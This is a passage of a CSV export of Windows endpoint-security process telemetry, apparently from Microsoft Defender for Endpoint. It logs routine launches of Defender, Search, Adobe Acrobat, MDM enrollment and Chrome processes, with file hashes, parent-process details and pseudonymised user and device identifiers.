Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+211,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:16:55.045430900+00:00,3472,SenseCncProxy.exe,3340,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:16:55.343128800+00:00,2021-06-24 01:17:04.716021600+00:00,ed5fd089-0b17-4d16-93fe-fb6b79513e39,computerpii_0a470890c60768167990033d701e7bd881398861,170351,False,10.7740.19041.1052,False,11540474045137006,,11540474045175557,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+212,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:16:55.963238500+00:00,21156,SenseCncProxy.exe,4328,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:16:55.970948400+00:00,2021-06-24 01:17:04.716087100+00:00,9ee1c49a-f920-48a3-9b88-45048202c03f,computerpii_0a470890c60768167990033d701e7bd881398861,170353,False,10.7740.19041.1052,False,11540474045137006,,11540474045175558,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+213,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:11:25.000183700+00:00,18224,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0CC317D1-5FE6-F321-A95E-3DAFD4C43A9E ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:11:25.355898700+00:00,2021-06-23 04:12:01.376735600+00:00,e2a7759d-6338-4d00-8ebe-30df6310270e,computerpii_0a470890c60768167990033d701e7bd881398861,162439,False,10.7740.19041.1052,False,11540474045145394,,11540474045173356,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+214,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:52:20.905509600+00:00,13384,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,PortableExecutable,2021-02-17 04:34:50.954376500+00:00,C:\Windows\System32\RuntimeBroker.exe,103288,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:52:20.921681400+00:00,2021-06-25 00:54:13.978272900+00:00,aa280356-183b-4eaf-bedf-c6e9c802d9d4,computerpii_0a470890c60768167990033d701e7bd881398861,182019,False,10.7740.19041.1052,False,11540474045136908,,11540474045178501,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker
+215,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:52:49.679933100+00:00,19136,SenseCncProxy.exe,4184,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:52:50.673374+00:00,2021-06-25 00:54:13.979695400+00:00,d26e65e8-9bde-4c6a-8155-72763fbf768b,computerpii_0a470890c60768167990033d701e7bd881398861,182036,False,10.7740.19041.1052,False,11540474045137006,,11540474045178503,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,2176,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+216,False,Medium,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:53:26.841692200+00:00,14236,SearchFilterHost.exe,"""SearchFilterHost.exe"" 0 816 820 828 8192 824 800 ",PortableExecutable,2021-06-09 01:20:40.727903+00:00,C:\Windows\System32\SearchFilterHost.exe,272384,ebf92961aa0ccc0ac803fdfa859d85d4,09a2cd711fd5076160ff590fcbc83ce4fc422c89e7373373cf3eda471c6d819a,4b51f519b24b0ea0e113973e5a65b3ba86517ac2,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:53:27.503625900+00:00,2021-06-25 00:54:13.980264100+00:00,a4578781-b9ea-463b-b1b0-060b129a83ab,computerpii_0a470890c60768167990033d701e7bd881398861,182043,False,10.7740.19041.1052,False,11540474045144190,,11540474045178504,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchFilterHost.exe,SearchFilterHost.exe,Microsoft Windows Search Filter Host
+217,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:05:13.655867700+00:00,1804,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""4644"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:05:13.710061300+00:00,2021-06-24 02:06:50.603326600+00:00,10b4c39a-70b9-437d-9741-0e4b18346f0a,computerpii_0a470890c60768167990033d701e7bd881398861,172940,False,10.7740.19041.1052,False,11540474045137006,,11540474045175915,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+218,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 11:02:55.196081100+00:00,15644,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,855264,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f7cb604f766e93a9393ab91047022e32e49197c5.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:02:55.291271800+00:00,2021-06-23 11:04:20.221114200+00:00,05b3b743-fb11-4f0c-ba2b-5a5cf9513b23,computerpii_0a470890c60768167990033d701e7bd881398861,167391,False,10.7740.19041.1052,False,11540474045172397,,11540474045175053,2021-06-23 01:22:19.362041700+00:00,5684,2021-06-23 01:22:19.362041700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,5684,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:19.361002600+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application
+219,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:04:11.792312400+00:00,11288,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /z",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:04:12.741710800+00:00,2021-06-25 02:04:37.871086100+00:00,e766c89c-861b-4822-801d-ab9a82af2692,computerpii_0a470890c60768167990033d701e7bd881398861,184862,False,10.7740.19041.1052,False,11540474045136925,,11540474045178952,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+220,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:08.634367+00:00,19520,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:08.727909700+00:00,2021-06-23 02:59:36.215165800+00:00,41e76521-fe62-4dfa-b50e-a86a32ef060b,computerpii_0a470890c60768167990033d701e7bd881398861,160222,False,10.7740.19041.1052,False,11540474045171838,,11540474045172873,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+221,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:08.703112+00:00,16016,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:08.730854300+00:00,2021-06-23 02:59:36.215200900+00:00,740838d9-948f-41fe-934f-5bc2a0a21bdc,computerpii_0a470890c60768167990033d701e7bd881398861,160223,False,10.7740.19041.1052,False,11540474045171838,,11540474045172874,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+222,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:08.972156600+00:00,1804,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7028 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:09.031386300+00:00,2021-06-23 02:59:36.215299500+00:00,b4bff2dd-25bf-474e-b569-1d1e9866dc0b,computerpii_0a470890c60768167990033d701e7bd881398861,160226,False,10.7740.19041.1052,False,11540474045171838,,11540474045172875,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,16512,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 